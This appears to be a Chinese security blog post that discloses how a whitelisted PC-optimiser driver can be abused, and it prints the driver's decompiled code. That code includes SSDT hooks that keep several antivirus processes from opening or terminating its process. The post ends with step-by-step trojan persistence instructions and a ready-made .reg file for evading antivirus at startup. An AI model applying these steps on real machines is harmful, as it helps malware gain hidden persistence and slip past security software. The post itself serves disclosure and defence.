浅谈白利用四
所谓权力越大,责任越大,驱动中被利用,可能导致的危害也更大,这里举个例子,也希望大家在写驱动的时候,除了完成功能外,也要考虑到是否有被恶意利用的可能。
MD5 746994da30a10488d090d95f28611e6f
pcmastercoredrv.sys 魔方电脑大师核心驱动程序
1, 挂钩 ZwOpenProcess,ZwTerminateProcess,禁止360,金山,腾讯,打开其进程,可能导致加速球类无法优化关闭其进程。、
2, 等WINLOGON起来后,读取注册表内的指定路径,写入RUN项,开机启动,没有任何验证,导致可被木马利用,随意加载启动项。
目前360已将该驱动清出白名单,但不清除其他杀软是否还在白名单里。
NTSTATUS __stdcall start(PDRIVER_OBJECTDriverObject, int a2) { NTSTATUS result; // eax@2 PVOID v3; // eax@6 PVOID v4; // edx@6 signed int i; // [sp+0h] [bp-30h]@3 HANDLE Handle; // [sp+8h] [bp-28h]@8 UNICODE_STRING SymbolicLinkName; //[sp+Ch] [bp-24h]@6 NTSTATUS status; // [sp+18h][bp-18h]@1 PDEVICE_OBJECT DeviceObject; //[sp+1Ch] [bp-14h]@1 UNICODE_STRING DestinationString; //[sp+24h] [bp-Ch]@1 PVOID DeviceExtension; // [sp+2Ch][bp-4h]@6 RtlInitUnicodeString(&DestinationString, L"\\Device\\PCMasterCoreDrv"); status =IoCreateDevice(DriverObject, 0x24u, &DestinationString, 0x22u, 0, 0,&DeviceObject); if ( status >= 0 ) { for ( i = 0; i < 27;++i ) DriverObject->MajorFunction[i] = (PDRIVER_DISPATCH)Generaldispatch; DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DispatchCreate; DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DispatchClose; DriverObject->MajorFunction[14]= (PDRIVER_DISPATCH)DispatchIoControl; DriverObject->DriverUnload = (PDRIVER_UNLOAD)DrvUnload; DeviceExtension =DeviceObject->DeviceExtension; *(_DWORD*)DeviceExtension = DeviceObject; v3 = DeviceExtension; *((_DWORD*)DeviceExtension + 1) = *(_DWORD *)&DestinationString; *((_DWORD *)v3 + 2) =DestinationString.Buffer; *((_DWORD*)DeviceExtension + 5) = 0; *((_BYTE*)DeviceExtension + 24) = 1; *((_DWORD*)DeviceExtension + 7) = 1; *((_DWORD*)DeviceExtension + 8) = 0; LogInit("===pDeviceExtension->StartupLogFinished = true\r\n"); RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\PCMasterCoreDrv"); v4 = DeviceExtension; *((_DWORD*)DeviceExtension + 3) = *(_DWORD *)&SymbolicLinkName; *((_DWORD *)v4 + 4) =SymbolicLinkName.Buffer; status =IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString); if ( status >= 0 ) { HookOpenTerminateProcess(); status =PsCreateSystemThread(&Handle, 0, 0, 0, 0, (PKSTART_ROUTINE)WartForWinLogonThread, DriverObject); if ( status< 0 ) sub_115C0(L"===Reg CreateThread WartForWinLogon Failed!\n"); status =PsCreateSystemThread(&Handle, 0, 0, 0, 0,(PKSTART_ROUTINE)LogProcessCPUUsageThread, DriverObject); ZwClose(Handle); result =status; } else { IoDeleteDevice(DeviceObject); result =status; } } else { result = status; } return result; } char __cdecl HookOpenTerminateProcess() { char result; // al@2 signed int v1; // eax@7 ULONG MajorVersion; // [sp+0h][bp-18h]@3 char v3; // [sp+Bh] [bp-Dh]@1 __int16 v4; // [sp+Ch] [bp-Ch]@1 ULONG MinorVersion; // [sp+10h][bp-8h]@3 ULONG BuildNumber; // [sp+14h][bp-4h]@3 v3 = 1; v4 = 0; if ( CheckSsdtHook() ) { result = 1; } else { PsGetVersion(&MajorVersion, &MinorVersion, &BuildNumber, 0); if ( MajorVersion == 5&& MinorVersion == 1 || MajorVersion >= 6 && MinorVersion>= 1 ) { v1 = MapKeServiceDescriptorTable(); v3 = v1>= 0; if ( v1>= 0 ) { OldZwOpenProcess = (int (__stdcall *)(_DWORD, _DWORD, _DWORD,_DWORD))_InterlockedExchange( (signed __int32 *)BaseAddressKeServiceDescriptorTable + *(_DWORD *)((char *)&ZwOpenProcess + 1), (signed __int32)MyZwOpenProcess); OldZwTerminateProcess = (int (__stdcall *)(_DWORD,_DWORD))_InterlockedExchange( (signed__int32 *)BaseAddressKeServiceDescriptorTable + *(_DWORD *)((char *)&ZwTerminateProcess + 1), (signed __int32)MyZwTerminateProcess); bHookFlag = 1; } } result = v3; } return result; } unsigned int __stdcallMyZwOpenProcess(HANDLE *a1, int a2, int a3, int a4) { unsigned int result; // eax@14 __int64 v5; // [sp+0h] [bp-18h]@4 int v6; // [sp+8h] [bp-10h]@1 PEPROCESS v7; // [sp+Ch] [bp-Ch]@4 PVOID Object; // [sp+10h] [bp-8h]@1 char *v9; // [sp+14h] [bp-4h]@6 Object = 0; v6 =OldZwOpenProcess(a1, a2, a3, a4); if ( v6 >= 0 && a1 && ObReferenceObjectByHandle(*a1, 1u, 0, 0, &Object, 0) >= 0 && (v5 = (unsigned int)PsGetProcessId(Object), v7 =IoGetCurrentProcess(), (PVOID)v7 != Object) && sub_138C0(v5) != -1 && (v9 = (char *)PsGetProcessImageFileName(v7), stricmp(v9,"lsass.exe")) && stricmp(v9, "csrss.exe") ) { if (!stricmp(v9, "kxetray.exe") || !stricmp(v9, "QQPCRealTimeSpeedup.exe") || !stricmp(v9, "QQPCTray.exe") || !stricmp(v9, "360Tray.exe") ) *a1 = 0; result= 0xC0000022u; } else { result = v6; } return result; } int __stdcall MyZwTerminateProcess(HANDLEHandle, int a2) { int result; // eax@8 __int64 v3; // [sp+0h] [bp-18h]@2 PEPROCESS CurrentProcess; // [sp+Ch][bp-Ch]@2 PVOID Object; // [sp+10h] [bp-8h]@1 char *ImageFileName; // [sp+14h][bp-4h]@4 if ( ObReferenceObjectByHandle(Handle,1u, 0, 0, &Object, 0) < 0 || (v3 =PsGetProcessId(Object), CurrentProcess = IoGetCurrentProcess(),(PVOID)CurrentProcess == Object) || sub_138C0(v3) == -1 ) { result =OldZwTerminateProcess(Handle, a2); } else { ImageFileName= (char *)PsGetProcessImageFileName(CurrentProcess); if (stricmp(ImageFileName, "kxetray.exe") &&stricmp(ImageFileName, "QQPCRealTimeSpeedup.exe") ) { if ( stricmp(ImageFileName, "QQPCTray.exe") ) stricmp(ImageFileName, "360Tray.exe"); } ObfDereferenceObject(Object); result= 0xC0000022u; } return result; } void __stdcall WartForWinLogonThread(inta1) { char v1; // [sp+3h] [bp-19h]@1 UNICODE_STRING DestinationString; //[sp+4h] [bp-18h]@8 PVOID j; // [sp+Ch] [bp-10h]@6 NTSTATUS i; // [sp+10h] [bp-Ch]@2 SIZE_T SystemInformationLength; //[sp+14h] [bp-8h]@1 PVOID P; // [sp+18h] [bp-4h]@1 SystemInformationLength = 0x100000u; P = 0; v1 = 0; WriteLog(L"===Reg Begin of WartForWinLogon\n"); while ( 1 ) { P =ExAllocatePool(PagedPool, SystemInformationLength); for ( i =ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P,SystemInformationLength, 0); i == 0xC0000004; i = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P,SystemInformationLength, 0) ) { SystemInformationLength += 0x100000u; ExFreePoolWithTag(P, 0); P =ExAllocatePool(PagedPool, SystemInformationLength); } if ( i < 0 ) break; for ( j = P; ; j = (char*)j + *(_DWORD *)j ) { if (*((_DWORD *)j + 17) ) { RtlInitUnicodeString(&DestinationString, L"winlogon.exe"); if ( RtlEqualUnicodeString((PCUNICODE_STRING)j + 7, &DestinationString, 1u)) break; } if (!*(_DWORD *)j ) goto LABEL_12; } v1 = 1; WritePcMasterRegRun(); LABEL_12: ExFreePoolWithTag(P, 0); if ( v1 ) break; Sleep(100); } PsTerminateSystemThread(0); WriteLog(L"===Reg End ofWartForWinLogon\n"); } void __cdecl WritePcMasterRegRun() { signed int v0; // [sp+0h] [bp-18h]@1 signed int v1; // [sp+4h] [bp-14h]@1 int v2; // [sp+8h] [bp-10h]@1 PCWSTR SourceString; // [sp+Ch][bp-Ch]@1 int v4; // [sp+10h] [bp-8h]@1 PVOID P; // [sp+14h] [bp-4h]@1 v4 = 0; v1 = 1; v0 = 1; P = 0; v2 = 0; SourceString = L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster"; WriteLog(L"===Reg Begin ofWriteRegRun\n"); if ( ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster",L"pcmas", 4, &P, (size_t *)&v2) ) { v4 = *(_BYTE *)P; ExFreePoolWithTag(P,0x70726567u); } if ( ReadRegValue(SourceString,L"st", 4, &P, (size_t *)&v2) ) { v1 = *(_BYTE *)P; ExFreePoolWithTag(P,0x70726567u); } if ( v1 == 1 ) { WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_Tray\n"); WriteRegRun(L"pcmaster",(int)L"pcmastertray.exe", (int)L"/autostart"); } else { if ( !v4 ) { WriteLog(L"===Reg WriteRegRun_DelRegRun\n"); sub_14F20(L"pcmaster"); } } if ( ReadRegValue(SourceString,L"swg", 4, &P, (size_t *)&v2) ) { v0 = *(_BYTE *)P; ExFreePoolWithTag(P,0x70726567u); } if ( v0 == 1 ) { WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_WG\n"); WriteRegRun(L"winguard",(int)L"winguard.exe", (int)L"/autostart"); } } int __stdcall WriteRegRun(PCWSTRSourceString, int a2, int a3) { UNICODE_STRING DestinationString; //[sp+0h] [bp-1040h]@2 NTSTATUS v5; // [sp+8h] [bp-1038h]@2 UNICODE_STRING ValueName; // [sp+Ch][bp-1034h]@5 int v7; // [sp+14h] [bp-102Ch]@1 OBJECT_ATTRIBUTES ObjectAttributes;// [sp+18h] [bp-1028h]@2 HANDLE Handle; // [sp+30h][bp-1010h]@1 PVOID P; // [sp+34h] [bp-100Ch]@1 int v11; // [sp+38h] [bp-1008h]@1 ULONG DataSize; // [sp+3Ch][bp-1004h]@1 wchar_t Data; // [sp+40h][bp-1000h]@1 char v14; // [sp+42h] [bp-FFEh]@1 Handle = 0; P = 0; v7 = 0; v11 = (int)L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster"; Data = 0; memset(&v14, 0, 0xFFEu); DataSize = 0; WriteLog(L"===Reg Begin ofWriteRegRun\n"); if (ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster",L"Install_Dir", 1, &P, (size_t *)&v7) ) { sub_15310(&Data,2048, L"\""); sub_15310(&Data,2048, P); ExFreePoolWithTag(P,0x70726567u); RtlInitUnicodeString(&DestinationString,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"); ObjectAttributes.Length= 24; ObjectAttributes.RootDirectory = 0; ObjectAttributes.Attributes= 64; ObjectAttributes.ObjectName = &DestinationString; ObjectAttributes.SecurityDescriptor = 0; ObjectAttributes.SecurityQualityOfService = 0; v5 =ZwOpenKey(&Handle, 0xF003Fu, &ObjectAttributes); if ( v5 >= 0 ) { sub_15310(&Data,2048, a2); sub_15310(&Data, 2048, L"\""); if ( a3 ) { sub_15310(&Data, 2048, L" "); sub_15310(&Data, 2048, a3); } DataSize = 2* wcslen(&Data) + 2; RtlInitUnicodeString(&ValueName, SourceString); v5 = ZwSetValueKey(Handle, &ValueName, 0, 1u,&Data, DataSize); ZwClose(Handle); } } WriteLog(L"===Reg End ofWriteRegRun\n"); return 0; }
木马只需将自己的可执行文件,放在C盘根目录下,改名为pcmastertray.exe,或winguard.exe,并导入如下注册表,等自己程序起来后,删除注册表,则所有杀软查杀均无法查杀到,而该驱动在开机的时候,在WINLOGON起来之后,会自动将启动项写入注册表。由于写入是在驱动的SYSTEM 线程中,一般杀软不会拦截。
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei] [HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei\PCMaster] "pcmas"=dword:00000001 "st"=dword:00000001 "Install_Dir"="c:\\"
共有 0 条看法